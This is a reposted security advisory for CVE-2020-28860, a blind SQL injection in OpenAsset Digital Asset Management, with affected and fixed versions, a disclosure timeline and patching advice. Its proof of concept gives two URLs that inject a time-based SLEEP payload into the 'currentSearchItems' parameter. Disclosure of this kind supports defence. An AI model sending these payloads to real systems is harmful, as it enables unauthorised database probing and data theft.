Share
## https://sploitus.com/exploit?id=PACKETSTORM:160459
Title: Authenticated blind SQL injection (SQLi)  
  
  
  
Product: OpenAsset Digital Asset Management by OpenAsset  
  
  
  
Vendor Homepage: https://www.openasset.com/  
  
  
  
Vulnerable Version: 12.0.19 (Cloud) 11.2.1 (On-premise)  
  
  
  
Fixed Version: 12.0.23 (Cloud) 11.4.10 (On-premise)  
  
  
  
CVE Number: CVE-2020-28860  
  
  
  
Author: Jack Misiura from The Missing Link   
  
  
  
Website: https://www.themissinglink.com.au  
  
  
  
Timeline:  
  
  
  
2020-11-14 Disclosed to Vendor  
  
2020-12-04 Vendor releases final patches  
  
2020-12-10 Publication  
  
  
  
1. Vulnerability Description  
  
  
  
The OpenAsset Digital Asset Management application was vulnerable to a blind SQL injection, through the /AJAXPage/SearchResults endpoint, via the "currentSearchItems" parameter.  
  
  
  
2. PoC  
  
  
  
The following requests will result in > 10 second delay in the response, due to the introduction of the SLEEP(10) command into the SQL query:  
  
  
  
https://example.com/AJAXPage/SearchResults?currentSearchItems=newUpload:0=11)%20AND%20(SELECT%20SLEEP(10))=1%23  
  
https://example.com/AJAXPage/SearchResults?currentSearchItems=album%3A1=196)%20AND%20(SELECT+SLEEP(10)=1)%23  
  
  
  
  
  
3. Solution  
  
  
  
The vendor provides an updated version (11.4.10) which should be installed immediately. If using the cloud version, the vendor has already updated it.  
  
  
  
4. Advisory URL  
  
  
  
https://www.themissinglink.com.au/security-advisories